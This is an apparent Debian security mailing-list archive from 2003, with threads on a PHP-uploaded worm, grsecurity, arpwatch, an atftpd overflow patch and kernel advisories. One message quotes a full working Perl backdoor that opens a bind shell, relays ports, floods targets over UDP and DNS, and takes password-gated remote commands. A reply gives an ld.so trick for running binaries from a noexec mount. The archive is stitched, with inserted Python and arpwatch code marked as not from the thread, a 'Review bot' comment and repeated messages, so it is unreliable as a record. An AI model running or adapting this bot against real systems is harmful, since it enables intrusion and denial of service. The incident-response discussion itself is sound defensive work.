> kernels or if I have to get the sources from kernel.org and patch it
> myself? 

See DSA 311-1 at http://www.debian.org/security/2003/dsa-311


-- 
 ___
| Web: http://web.morgul.net/~frodo/
| PGP Public Key: http://web.morgul.net/~frodo/mail.html 




Re: cronjob stuck

2003-06-11 Thread William Law
Have you tried checking the root crontab? not a normal place to put stuff,
but worth checking out anyway...

Regards,

William

On Tue, 10 Jun 2003, Dale Amon wrote:

> Just ran across an interesting prob, wondered if
> anyone else has seen it. I added a repeating entry
> to /etc/cron.d/foo that ran every */5 minutes. I
> then tried to get rid of it... It will not die.
> 
> I moved the file out of /etc/cron.d and it still
> is running.
> 
> I cp'd the file and deleted the old one in case
> cron remembered the inode (rather a long shot).
> No change.
> 
> I did /etc/init.d/cron stop; /etc/init.d/cron start;
> still it repeats.
> 
> I did updatedb and locate cron; can't find it cached
> anywhere.
> 
> cron doesn't seem to have any flush options and no
> indication that it should be caching across executions.
> 
> I could certainly (I hope!) get rid of it by rebooting
> but I can't do that with this system at this time.
> 
> Has anyone else had trouble making vixie cron STFU? Am
> I hallucinating? Is my brain in need of Coke and M&M's?
> 
> -- 
> --
>IN MY NAME:Dale Amon, CEO/MD
>   No Mushroom clouds over Islandone Society
> London and New York.  www.islandone.org
> --
> 
> 



Re: cronjob stuck

2003-06-11 Thread Dale Amon
On Thu, Jun 12, 2003 at 11:55:00AM +1000, William Law wrote:
> Have you tried checking the root crontab? not a normal place to put stuff,
> but worth checking out anyway...

Yeah, I'd checked everything. Just didn't account for pure
blind bad luck chance :-)

(you probably read my second post by now)

 



Re: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread Celso González
On Tue, Jun 10, 2003 at 02:58:27PM -0500, Robert Ebright wrote:
> Hello,
> I logged in to my server today to find that
> /usr/sbin/ncsd was running about 50 copies,
> since I don't have BIND installed, obviously
> something was up...they were also running with
> the user www-data...
> After a little bit of research I found a new
> crontab entryFile: /tmp/crontab.LYukbF
> 0 * * * * /tmp/.nscdrecover

Hi

I dont have any information about your trojan, but i can give you a 
solution (also a good security practice)

Mount /tmp in a separate partition with the noexec flag in fstab

This will disable most of the trojans

Best regards

-- 
Celso González 
http://bulmalug.net


pgp0.pgp
Description: PGP signature


Re: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread Giacomo Mulas
On Wed, 11 Jun 2003, Celso González wrote:

> I dont have any information about your trojan, but i can give you a
> solution (also a good security practice)
>
> Mount /tmp in a separate partition with the noexec flag in fstab
>
> This will disable most of the trojans

Sorry to delude you, but browse the archives: you will find that even with
a noexec partition you can run any executable by just invoking

/lib/ld.so /tmp/yourexecutable

Bye
Giacomo

-- 
_

Giacomo Mulas <[EMAIL PROTECTED]>
_

OSSERVATORIO ASTRONOMICO DI CAGLIARI
Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA)

Tel. (OAC): +39 070 71180 248 Fax : +39 070 71180 222
Tel. (UNICA): +39 070 675 4916
_

"When the storms are raging around you, stay right where you are"
 (Freddy Mercury)
_


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



RE: OPENSSL

2003-06-11 Thread Stefan Neufeind
On 11 Jun 2003 at 6:59, Reckhard, Tobias wrote:

> On Tue, Jun 10, Stefan Neufeind wrote:
> > I'm using a 128-bit-cert.
> 
> You're using an X.509 certificate. The grade of symmetric encryption
> negotiated between browser and web server is (at least in theory)
> independent of the certificate.
> 
> > But browsers that support less encryption 
> > (e.g. IE that comes with WinNT4) can't access my SSL-pages because
> > the encryption doesn't allow degration.
> 
> The original NT shipped with IE2. Are you sure you want people to
> still use that?

Well, some people here still use it. Mainly for reading emails via 
webmail ... Users with original NT4 or some version of Mac OS are 
currently having problems accessing the webmail-interface. But I 
don't want to drop to http-without-SSL for webmail. And I can't 
install new browser versions on those machines since I don't 
administrate them. So for now these users can't view there emails 
from that machines.

> > Is there any way to solve 
> > this prob? Using Apache with an official SSL-cert.
> > 
> > PS: This just came to my mind when you said "step-up" - cause in my
> > case it would be a "step-down", right?
> 
> I could imagine that IE2 has numerous problems with SSL. It could well
> be one of the browsers that need to see step-up certificates before
> they perform 128-bit symmetric cryptography. But I don't know.
> 
> Make sure you've allowed your Apache to use small key sizes first. I
> wouldn't use them, but you should be sure that it's not your server
> that's refusing to do e.g. 40-bit RC4. Then I'd urge the NT users to
> apply the latest service pack and preferrably install IE6SP1 plus the
> Hotfixes that have been released since.

Will have a look at that. Funny thing: Users can view the first page 
(login-page) but afterwards can't login. Maybe it has got something 
to do with keepalives or anything?!?

> And then they should install a better browser and use that instead.
> ;->

Read statement above. Would REALLY like to do that if I could.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread Phillip Hofmeister
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Wed, 11 Jun 2003 at 10:47:49AM +0200, Giacomo Mulas wrote:
> On Wed, 11 Jun 2003, Celso Gonz?lez wrote:
> 
> > I dont have any information about your trojan, but i can give you a
> > solution (also a good security practice)
> >
> > Mount /tmp in a separate partition with the noexec flag in fstab
> >
> > This will disable most of the trojans
> 
> Sorry to delude you, but browse the archives: you will find that even with
> a noexec partition you can run any executable by just invoking
> 
> /lib/ld.so /tmp/yourexecutable

While I agree with your observation I feel compelled to defend his
point.

He said mounting /tmp will stop MOST Trojans.  While it might not stop a
trojan planted by a person, it will stop a trojan planted by a worm
(which is what this thread is about) since the author of the worm might
not have had the insight to use ld.so.

Take care,

- -- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
- --
Excuse #66: Unoptimized hard drive 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQE+5yG/S3Jybf3L5MQRAtz3AJ4oU0nYQytble771jtm9XdoTateOACdFSGD
qcSmvXIQBxHUQlgrf5o/ui0=
=BVu8
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread Giacomo Mulas
On Wed, 11 Jun 2003, Phillip Hofmeister wrote:

> While I agree with your observation I feel compelled to defend his
> point.
>
> He said mounting /tmp will stop MOST Trojans.  While it might not stop a
> trojan planted by a person, it will stop a trojan planted by a worm
> (which is what this thread is about) since the author of the worm might
> not have had the insight to use ld.so.

I see what you mean, in this sense he is obviously right.

Bye
Giacomo

-- 
_

Giacomo Mulas <[EMAIL PROTECTED]>
_

OSSERVATORIO ASTRONOMICO DI CAGLIARI
Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA)

Tel. (OAC): +39 070 71180 248 Fax : +39 070 71180 222
Tel. (UNICA): +39 070 675 4916
_

"When the storms are raging around you, stay right where you are"
 (Freddy Mercury)
_


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



RE: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread DEFFONTAINES Vincent
> While I agree with your observation I feel compelled to 
> defend his point.
> 
> He said mounting /tmp will stop MOST Trojans.  While it might 
> not stop a trojan planted by a person, it will stop a trojan 
> planted by a worm (which is what this thread is about) since 
> the author of the worm might not have had the insight to use ld.so.
> 

A good solution, not too hard to implement, is to patch your kernel with
grsecurity.
Grsecurity provides a very good level of protection against buffer overflow
attacks,
It randomizes PIDs, it protects chroots, enforces the TCP/IP stack, etc.

Grsecurity is actually a cumulative patch from Pax, some OpenBSD TCP/IP
stuff ported 
into linux, openwall, HAP-linux.

Btw it is very configurable, and pretty well documented, at configuration
level.

I use it and am very happy with it. If I trust archives from this list, I am
not 
the only one in this case :-)

http://www.grsecurity.net


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread Victor Calzado Mayo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi

On Tuesday 10 June 2003 21:58, Robert Ebright wrote:

Have you copied the home directory of the user www-data to the new server?
In Debian it is located in the root directory of the web server, so if you have 
copied the document root from the old server you have copied all the dot files for 
the user, and quite possibly you have copied the crontab file of www-data.

If you look at the syslog entries you can figure out how the worm replicates itself 
and how the rootkit is enabled ( only guessing )


> and under SYSLOG it starts
>
the system finds a crontab for the user www-data

user www-data has executed the command crontab -l

> syslog.3:Jun  6 16:27:27 debian crontab[26795]:
> (www-data) LIST (www-data)

and has replaced the file

> syslog.3:Jun  6 16:27:28 debian crontab[26798]:
> (www-data) REPLACE (www-data)

hummm, maybe he isn't very smart, www-data has done it again

> syslog.3:Jun  6 16:27:34 debian crontab[26804]:
> (www-data) LIST (www-data)
> syslog.3:Jun  6 16:27:34 debian crontab[26807]:
> (www-data) REPLACE (www-data)

cron sees the new crontab file for www-data, reads the file, and executes the 
commands...

> syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD
> (/tmp/.nscdrecover)
>

hummm, you have to figure out how /tmp/.nscdrecover has been 
copied; it is difficult to say, but maybe another crontab entry of the 
user www-data starts the work... who knows...


> so I found /tmp/.ncsdrecover and it looks like
> some kind of port scanner/trojan
>

it sounds like a local exploit against nscd which is trying to get a root 
shell and put it on the wire


> the contents are pasted below
>
>
> #!/usr/bin/perl -w
>
> $pass = "J9YcGEyNypkzI";
> $str = 'Mess with the best - die like a
> rest!'x1337;
> use IO::Socket;
> use IO::Select;
> use POSIX;
>
> sub redir
> {
> my $port = shift;
> my $dest = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> $sa = IO::Socket::INET->new( Proto => "tcp",
> Listen => 1, ReuseAddr => 1,
> LocalPort =>$port) or exit;
> $sin = $sa->accept or exit;
> close($sa);
> alarm 0;
> $sout = IO::Socket::INET->new( Proto => "tcp",
> PeerAddr => $dest) or exit;$sin->autoflush(1);
> $sout->autoflush(1);
> $sel = IO::Select->new($sin, $sout);
> while(@sock = $sel->can_read(180)) {
> foreach $s(@sock) {
> $buf = <$s>; exit unless($buf);
> print $sout $buf if($s eq $sin);
> print $sin $buf if($s eq $sout);
> }}}
>
> sub shell
> {
> my $port = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> use Socket;
> socket(S, PF_INET, SOCK_STREAM, 0);
> setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
> bind(S, sockaddr_in($port, INADDR_ANY));
> listen(S, 1);
> accept(X, S);
> close(S);
> alarm 0;
> open STDIN, "<&X";
> open STDOUT, ">&X";
> open STDERR, ">&X";
> close X;
> exec("/bin/sh");
> }
>
> sub udp
> {
> my $host = shift;
> my $time = shift;
> $sock = IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $host,
> PeerPort => int(rand 65535))
> or exit;
> $sock->autoflush(1);$SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> print $sock $str while(1);
> }
> }
>
> sub ddns
> {
> my $host = shift;
> my $time = shift;
> $sock = new IO::Socket::INET->new(Proto
> => 'udp', PeerAddr => $host,
> PeerPort => 53) or exit;
> $sock->autoflush(1);
> $SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> while(1) {
> my $s = int(rand(89)+10);
> my $r1 = int(rand(89)+10);
> my $r2 = int(rand(89)+10);
> my $r3 = int(rand(89)+10);
> my $r4 = int(rand(89)+10);
> 
> send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3
>\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}
>
> $0 = '/usr/sbin/nscd'.' 'x100;
> exit if fork;
> $SIG{ALRM} = 'IGNORE';
> $SIG{TERM} = 'IGNORE';
> $SIG{CHLD} = 'IGNORE';
> $SIG{INT} = 'IGNORE';
> $SIG{QUIT} = 'IGNORE';
> $SIG{HUP} = 'IGNORE';
> open STDIN, " open STDOUT, ">/dev/null";
> open STDERR, ">/dev/null";
> POSIX::setsid();
>
> $csock = IO::Socket::INET->new(Proto => 'udp',
> LocalPort => 1337, ReuseAddr => 1) or
> exit;while($string =<$csock>)
> {
> chop($string);
> my ($pw, $cmd, $arg1, $arg2) = split "
> ", $string;next unless($cmd);
> next unless($arg1);
> next unless(crypt($pw, $pass) eq $pass);
> if ($cmd eq "ping") {
> my $bsock =
> IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $arg1,
>   PeerPort => $arg2,
> ReuseAddr => 1) or
> next;
> print $bsock"pong
> ".`uname -mnrs`; close $bsock;
> 
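The sequence Victor walks through above (crontab LIST/REPLACE by www-data, then cron running /tmp/.nscdrecover) is exactly the kind of thing a log check can catch. Below is an added example, not code from the thread: a small Python scanner run over constructed syslog lines modelled on the quoted ones; the list of service accounts that should never own a crontab is an assumption.

```python
"""Scan syslog for the cron pattern seen above (added example, not from the
thread): a service account installing a crontab, and cron then running a
command out of /tmp or a dot-file."""
import re

# Accounts that should never own a crontab on this host (assumed list).
SERVICE_ACCOUNTS = {"www-data", "nobody"}

# e.g. "Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)"
SYSLOG_RE = re.compile(r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
                       r"(?P<prog>[^\[\s]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$")
CRONTAB_RE = re.compile(r"^\((?P<user>[^)]+)\) (?P<action>LIST|REPLACE|DELETE) \(")
CRON_CMD_RE = re.compile(r"^\((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$")


def parse_line(line):
    # Split one syslog line into its fields; None if it does not parse.
    m = SYSLOG_RE.match(line.strip())
    return m.groupdict() if m else None


def suspicious_command(cmd):
    """True when the executable lives in scratch space or is a hidden file."""
    first = cmd.split()[0] if cmd.split() else ""
    return first.startswith(("/tmp/", "/var/tmp/", "/dev/shm/")) or "/." in first


def scan(lines):
    """Return (timestamp, user, reason) alerts for the given syslog lines."""
    alerts = []
    replaced = set()  # users that replaced their crontab earlier in the log
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["prog"] == "crontab":
            m = CRONTAB_RE.match(rec["msg"])
            if m and m.group("action") == "REPLACE" and m.group("user") in SERVICE_ACCOUNTS:
                replaced.add(m.group("user"))
                alerts.append((rec["ts"], m.group("user"), "service account installed a crontab"))
        elif rec["prog"].upper() == "/USR/SBIN/CRON":
            m = CRON_CMD_RE.match(rec["msg"])
            if m and suspicious_command(m.group("cmd")):
                reason = "cron ran %s from scratch space" % m.group("cmd")
                if m.group("user") in replaced:
                    reason += " after replacing its own crontab"
                alerts.append((rec["ts"], m.group("user"), reason))
    return alerts


# Constructed sample, modelled on the lines quoted in the thread.
SAMPLE_LOG = """\
Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)
Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)
Jun  6 17:05:01 debian /USR/SBIN/CRON[26950]: (root) CMD (run-parts /etc/cron.hourly)
""".splitlines()

if __name__ == "__main__":
    for ts, user, reason in scan(SAMPLE_LOG):
        print(ts, user, reason)
```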

2.5 and grsec [was Re: a weird script worm uploaded via php with debian 3.0 ?]

2003-06-11 Thread Dale Amon
On Wed, Jun 11, 2003 at 03:24:11PM +0200, DEFFONTAINES Vincent wrote:
> I use it and am very happy with it. If I trust archives from this list, I am
> not 
> the only one in this case :-)

Is anyone using it with 2.5? I'm on the cusp of switching a
few machines to it to get up the learning curve before 2.6
comes to pass.

I would not think a 2.4 patchset would have much chance of
working against it...





arpwatch exclusion ?

2003-06-11 Thread Jacques Foury
Hello all.

I am using arpwatch, but I use a few machines with 2 ethernet cards, and 
they often flip-flop... As I know them, I want to exclude the flip-flop 
mails from my mailbox...

How could I tune arpwatch so that it does not listen to those 
flip-flops, or it does not send mails for these ?

Thank you !

--
Jacques Foury




Re: arpwatch exclusion ?

2003-06-11 Thread Chatchai JANTARAPRIM
On Wed, 11 Jun 2003, Jacques Foury wrote:

> Date: Wed, 11 Jun 2003 17:50:14 +0200
> From: Jacques Foury <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: arpwatch exclusion ?
> Resent-Date: Wed, 11 Jun 2003 11:10:48 -0500 (CDT)
> Resent-From: [EMAIL PROTECTED]
> 
> Hello all.
> 
> I am using arpwatch, but I use a few machines with 2 ethernet cards, and 
> they often flip-flop... As I know them, I want to exclude the flip-flop 
> mails from my mailbox...
> 
> How could I tune arpwatch so that it does not listen to those 
> flip-flops, or it does not send mails for these ?

Well you will have almost the same mail content/header sent from
arpwatch. So why not use your mail-filter to filter out this kind
of mail? No need to fix arpwatch, it is supposed to work that way.

cj
> 
> Thank you !
> 
> -- 
> Jacques Foury





Re: apache

2003-06-11 Thread Glen Mehn
Martynas Domarkas wrote:



Yes, of course. But in this case I will invoke rotatelogs... I don't
like it.

Martynas:

three people now have given you advice on how to fix your "problem" 
three different ways. Apache doesn't have this behaviour: in fact, the 
apache foundation suggests you use cronolog:

http://httpd.apache.org/docs/logs.html#piped

If you don't like this behaviour, take it up on the apache lists, 
although it's been discussed before.

glen
--
Glen Mehn   [EMAIL PROTECTED]
"if you ever swallow the universe, remember to spit the dragon
back out.xx.--swan


Re: kernel-source 2.4.20 + grsecurity + freeswan

2003-06-11 Thread simon raven
Le jeu, Jun 05, 2003 a 21:50:33 -0400, Hubert Chan a écrit:
> > "Vinai" == Vinai Kopp <[EMAIL PROTECTED]> writes:
> 
> [...]
> 
> Vinai> There seem to be problems using both the grsecurity and the
> Vinai> freeswan patches (at least I haven't been successful applying
> Vinai> the patches - I tried the debian versions and the "official" ones
> Vinai> from the different project sites of the patches and the kernel
> Vinai> sources).
> 
> I have a Debian/sid machine running a 2.4.20 kernel with both patches
> applied (along with a whole bunch of other patches), and had no problems
> applying the patches.  The patches and kernel sources I got from the sid
> repository maybe about a month ago.  I would imagine that there
> shouldn't be much of an issue using the patches and kernel sources from
> sid on a stable box.

do you happen to have XFS patched onto that kernel? :) and what was the
order of the patching? 

eric
(infrequent poster)

> -- 
> Hubert Chan <[EMAIL PROTECTED]> - http://www.uhoreg.ca/
> PGP/GnuPG key: 1024D/124B61FA
> Fingerprint: 96C5 012F 5F74 A5F7 1FF7  5291 AF29 C719 124B 61FA
> Key available at wwwkeys.pgp.net.   Encrypted e-mail preferred.



-- 
UNIX is user friendly, it's just picky about who its friends are.  
---
 ,''`.   http://www.debian.org/  | http://www.nuit.ca/   
 : :' :  Debian GNU/Linux| http://simonraven.nuit.ca/
 `. `'   | PGP key ID: 6169 BE0C 0891 A038
  `- | 





Re: arpwatch exclusion ?

2003-06-11 Thread Blars Blarson
In article <[EMAIL PROTECTED]> 
[EMAIL PROTECTED] writes:
>I am using arpwatch, but I use a few machines with 2 ethernet cards, and 
>they often flip-flop... As I know them, I want to exclude the flip-flop 
>mails from my mailbox...
>
>How could I tune arpwatch so that it does not listen to those 
>flip-flops, or it does not send mails for these ?

Use the "-s program" option to send the "mail" via a program that does
whatever filtering you want.  I'm filtering out the proxy-arp responses
this way.  (There are hundreds of them every day on my firewall.)

Unless you know all flip-flops will be noise, I'd recommend only filtering
the ones you know about.

-- 
Blars Blarson   [EMAIL PROTECTED]
http://www.blars.org/blars.html
"Text is a way we cheat time." -- Patrick Nielsen Hayden

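Both answers to Jacques come down to the same thing: filter the flip-flop reports for the hosts you already know about and let everything else through. As an added example (not part of arpwatch or of either answer), here is a Python wrapper to install as the arpwatch "-s program"; it assumes arpwatch feeds each report to that program on stdin together with its sendmail arguments, that the Subject starts with the report type ("flip flop") and that the body carries an "ip address:" field; the sendmail path and the known-host IPs are placeholders.

```python
#!/usr/bin/env python3
"""Filter for arpwatch's "-s program" option (added example, not part of
arpwatch).  arpwatch hands each report to the program on stdin as a mail
message; this wrapper drops "flip flop" reports for the hosts we know have
two NICs and passes everything else to the real sendmail unchanged.
Assumed: the Subject begins with the report type and the body has an
"ip address:" field."""
import subprocess
import sys
from email import message_from_string

REAL_SENDMAIL = "/usr/sbin/sendmail"  # placeholder path
# Hosts known to flip-flop because they have two interfaces (constructed).
KNOWN_FLIPFLOP_IPS = {"192.0.2.10", "192.0.2.11"}


def report_ip(body):
    """Return the value of the 'ip address:' line in an arpwatch report body."""
    for line in body.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "ip address":
            return value.strip()
    return None


def should_drop(raw_message, known=KNOWN_FLIPFLOP_IPS):
    """True only for a flip-flop report about a host on the known list;
    anything else (other report types, unparsable bodies) is forwarded."""
    msg = message_from_string(raw_message)
    subject = (msg.get("Subject") or "").strip()
    if not subject.startswith("flip flop"):
        return False
    ip = report_ip(msg.get_payload())
    return ip is not None and ip in known


def main():
    raw = sys.stdin.read()
    if should_drop(raw):
        return 0
    # Forward with whatever arguments arpwatch gave us (its sendmail flags).
    proc = subprocess.run([REAL_SENDMAIL] + sys.argv[1:], input=raw.encode())
    return proc.returncode


if __name__ == "__main__":
    sys.exit(main())
```

Keep the known-host list to machines you have actually verified as dual-homed, as Blars says; an unknown host flip-flopping still reaches your mailbox.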




atftpd vulnerability and patch?

2003-06-11 Thread Drew Scott Daniels
http://packetstorm.linuxsecurity.com/filedesc/atftpdx.c.html says: Proof
of concept remote root exploit for atftpd version 0.6. Makes use of the
filename overflow found by Rick Patel. Related post here. Tested against
Debian 3.0. By gunzip

http://packetstorm.linuxsecurity.com/filedesc/atftpd.patch.html says:
Simple patch to fix the overflow found in atftpd by Rick Patel. By gunzip

The patch is:
--- tftpd_file.cTue Mar 12 05:26:18 2002
+++ tftpd_file_diff.c   Thu Jun  5 20:31:06 2003
@@ -357,7 +357,8 @@
  else
  {
   strcpy(filename, directory);
-  strncat(filename, data->tftp_options[OPT_FILENAME].value, VAL_SIZE);
+  strncat(filename, data->tftp_options[OPT_FILENAME].value,
+   VAL_SIZE - strlen( directory ) - 1 );
  }

  /* If the filename contain /../ sequences, we forbid the access */
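Review bot: the new bound `VAL_SIZE - strlen( directory ) - 1` is only safe if `filename` is a VAL_SIZE-byte buffer and `directory` is already shorter than that, and neither is checked in this hunk: the preceding `strcpy(filename, directory);` is still unbounded, and if `strlen(directory) >= VAL_SIZE - 1` the subtraction wraps around as size_t to a huge count, so strncat can overflow again. Suggest replacing the strcpy/strncat pair with one bounded call, `snprintf(filename, VAL_SIZE, "%s%s", directory, data->tftp_options[OPT_FILENAME].value)`, and rejecting the request when its return value is >= VAL_SIZE (using `sizeof filename` instead of VAL_SIZE if the buffer is declared with it, so the bound cannot drift from the declaration).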



http://packages.qa.debian.org/a/atftp.html shows:
[2002-04-24] Accepted atftp 0.6.1.1 (source hppa)
[2002-04-13] Accepted atftp 0.6.1 (i386 source)
[2002-03-31] Accepted atftp 0.6 (i386 source)
[2002-02-11] Installed atftp 0.5 (i386 source)
[2001-07-21] Installed atftp 0.4 (i386 source)
[2001-03-05] Installed atftp 0.3 (i386 source)
[2000-12-27] Installed atftp 0.2 (i386 source)
[2000-08-21] Installed atftp 0.1 (source i386)

and:
Testing 0.6.1.1
Stable 0.6

I'm guessing atftp is vulnerable, but without checking I won't file a bug.
Checking the code should be easy, but checking if this could actually be
exploited would take a bit more thought. If stable is actually vulnerable
and exploitable then the security team should be co-ordinated with.

 Drew Daniels





grsecurity vs lsm vs lids

2003-06-11 Thread Mark Devin
OK, I have been seeing lots of people on this list recommend using the
grsecurity kernel patch.  Now I want to give it a go, but I see that
there is also a lsm patch and I also remember lids being recommended in
the past by others.
I would like to learn the interface to what is going to become the
standard in future kernels.  I read something while googling that
suggested that lsm seems to be the way that the kernel is heading.
What do people on this list recommend?

Regards.
Mark.


Kernel Security Fixes

2003-06-11 Thread Peter Holm
Hi,

just got an announcement from the mandrake security list.

Could please someone of the people with a deeper knowledge explain, if
the mentioned issues are addressed in one of the "stock" debian
kernels or if I have to get the sources from kernel.org and patch it
myself? 



Mandrake Linux Security Update Advisory

Multiple vulnerabilities were discovered and fixed in the Linux
kernel.
 
 * CAN-2003-0001: Multiple ethernet network card drivers do not pad
   frames with null bytes which allows remote attackers to obtain
   information from previous packets or kernel memory by using
   special malformed packets.
 
 * CAN-2003-0244: The route cache implementation in the 2.4 kernel and
   the Netfilter IP conntrack module allows remote attackers to cause a
   Denial of Service (DoS) via CPU consumption due to packets with
   forged source addresses that cause a large number of hash table
   collisions related to the PREROUTING chain.
 
 * CAN-2003-0246: The ioperm implementation in 2.4.20 and earlier
   kernels does not properly restrict privileges, which allows local
   users to gain read or write access to certain I/O ports.
 
 * CAN-2003-0247: A vulnerability in the TTY layer of the 2.4 kernel
   allows attackers to cause a kernel oops resulting in a DoS.
 
 * CAN-2003-0248: The mxcsr code in the 2.4 kernel allows attackers to
   modify CPU state registers via a malformed address.



Thank you very much for your attention!




Have a nice thread,
Peter





Re: Kernel Security Fixes

2003-06-11 Thread Noah Meyerhans
On Thu, Jun 12, 2003 at 01:18:59AM +0200, Peter Holm wrote:
> Could please someone of the people with a deeper knowledge explain, if
> the mentioned issues are addressed in one of the "stock" debian
> kernels or if I have to get the sources from kernel.org and patch it
> myself? 

See DSA 311-1 at http://www.debian.org/security/2003/dsa-311


-- 
 ___
| Web: http://web.morgul.net/~frodo/
| PGP Public Key: http://web.morgul.net/~frodo/mail.html 




Re: cronjob stuck

2003-06-11 Thread William Law
Have you tried checking the root crontab? not a normal place to put stuff,
but worth checking out anyway...

Regards,

William

On Tue, 10 Jun 2003, Dale Amon wrote:

> Just ran across an interesting prob, wondered if
> anyone else has seen it. I added a repeating entry
> to /etc/cron.d/foo that ran every */5 minutes. I
> then tried to get rid of it... It will not die.
> 
> I moved the file out of /etc/cron.d and it still
> is running.
> 
> I cp'd the file and deleted the old one in case
> cron remembered the inode (rather a long shot).
> No change.
> 
> I did /etc/init.d/cron stop; /etc/init.d/cron start;
> still it repeats.
> 
> I did updatedb and locate cron; can't find it cached
> anywhere.
> 
> cron doesn't seem to have any flush options and no
> indication that it should be caching across executions.
> 
> I could certainly (I hope!) get rid of it by rebooting
> but I can't do that with this system at this time.
> 
> Has anyone else had trouble making vixie cron STFU? Am
> I hallucinating? Is my brain in need of Coke and M&M's?
> 
> -- 
> --
>IN MY NAME:Dale Amon, CEO/MD
>   No Mushroom clouds over Islandone Society
> London and New York.  www.islandone.org
> --





Re: cronjob stuck

2003-06-11 Thread Dale Amon
On Thu, Jun 12, 2003 at 11:55:00AM +1000, William Law wrote:
> Have you tried checking the root crontab? not a normal place to put stuff,
> but worth checking out anyway...

Yeah, I'd checked everything. Just didn't account for pure
blind bad luck chance :-)

(you probably read my second post by now)

 





Re: Kernel Security Fixes

2003-06-11 Thread Javier Fernández-Sanguino Peña
On Thu, Jun 12, 2003 at 01:18:59AM +0200, Peter Holm wrote:
> Hi,
> 
> just got an announcement from the mandrake security list.
> 
> Could please someone of the people with a deeper knowledge explain, if
> the mentioned issues are addressed in one of the "stock" debian
> kernels or if I have to get the sources from kernel.org and patch it
> myself? 

That's easy. You just need to browse 
http://www.debian.org/security/crossreferences and search the CVE names 
(the stuff that says CAN-- or CVE--) against published 
advisories.

See below.

> 
> 
> 
> Mandrake Linux Security Update Advisory
> 
> Multiple vulnerabilities were discovered and fixed in the Linux
> kernel.
>  
>  * CAN-2003-0001: Multiple ethernet network card drivers do not pad
(..)

Fixed in DSA 311.

>  
>  * CAN-2003-0244: The route cache implementation in the 2.4 kernel and

Ditto.

>  * CAN-2003-0246: The ioperm implementation in 2.4.20 and earlier

Same.

>  * CAN-2003-0247: A vulnerability in the TTY layer of the 2.4 kernel

Ditto.
>  
>  * CAN-2003-0248: The mxcsr code in the 2.4 kernel allows attackers to

Ditto.

See http://www.debian.org/security/2003/dsa-311
 (for i386):
   Security database references:
  In Mitre's CVE dictionary: CVE-2002-0429, CAN-2003-0001,
  CAN-2003-0127, CAN-2003-0244, CAN-2003-0246, CAN-2003-0247,
  CAN-2003-0248, CAN-2003-0364.
 
Regards

Javi

